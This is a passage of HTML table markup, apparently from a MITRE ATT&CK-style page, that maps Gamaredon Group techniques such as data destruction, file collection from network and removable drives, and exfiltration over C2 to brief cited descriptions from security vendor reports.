style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1485"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1485</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1485"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Data Destruction</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used tools to delete files and folders from victims' desktops and profiles.</span><a href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1005</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Data from Local System</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has collected files from infected systems and uploaded them to a C2 server.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1039"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1039</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1039"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Data from Network Shared Drive</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> malware has collected Microsoft Office documents from mapped network drives.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1025"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1025</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1025"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Data from Removable Media</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">A </span><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> file stealer has the capability to steal data from newly connected logical volumes on a system, including USB drives.</span><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[1]</span></a><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1491"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1491</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1491/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.001</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1491"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Defacement</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1491/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Internal Defacement</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has left taunting images and messages on the victims' desktops as proof of system access.</span><a href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1140"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1140</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1140"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Deobfuscate/Decode Files or Information</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> tools decrypted additional payloads from the C2. </span><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has also decoded base64-encoded source code of a downloader.</span><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[2]</span></a><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1568"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1568</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1568"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Dynamic Resolution</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has incorporated dynamic DNS domains in its infrastructure.</span><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[8]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1041"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1041</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1041"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Exfiltration Over C2 Channel</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">A </span><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> file stealer can transfer collected files to a hardcoded C2 server.</span><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[1]</span></a></p></td></tr><tr style="height:56.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1083"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1083</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1083"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">File and Directory Discovery</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> macros can scan for Microsoft Word and Excel files to inject with additional malicious macros. </span><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has also used its backdoors to automatically list interesting files (such as Office documents) found on a system.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[8]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p 